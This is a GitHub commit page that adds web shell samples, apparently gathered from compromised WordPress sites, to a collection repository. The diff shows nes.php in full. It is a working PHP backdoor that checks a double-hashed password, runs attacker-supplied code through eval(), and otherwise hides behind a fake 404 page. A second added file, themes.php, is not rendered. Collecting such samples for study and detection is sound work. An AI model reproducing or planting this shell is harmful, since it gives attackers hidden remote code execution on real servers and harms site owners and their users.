Skip to content

Commit dce1393

Browse files
committed
More wordpress shell/exploit scripts
1 parent 7574e68 commit dce1393

File tree

3 files changed

+1205
-0
lines changed

3 files changed

+1205
-0
lines changed

found_on_wordpress/nes.php

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
<?php
2+
@set_time_limit(0);
3+
@error_reporting(NULL);
4+
@ini_set('display_errors',0);
5+
@ignore_user_abort(TRUE);
6+
7+
if(md5(md5($_REQUEST['psbt']))=='14b8103de4b68aed89e2907177686ada' and $_REQUEST['mjdu']!=NULL)
8+
{
9+
$_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
10+
$_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
11+
eval($_REQUEST['mjdu']);
12+
die();
13+
exit();
14+
}
15+
else
16+
{
17+
echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit();
18+
}
19+
?>

found_on_wordpress/themes.php

Lines changed: 1 addition & 0 deletions
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)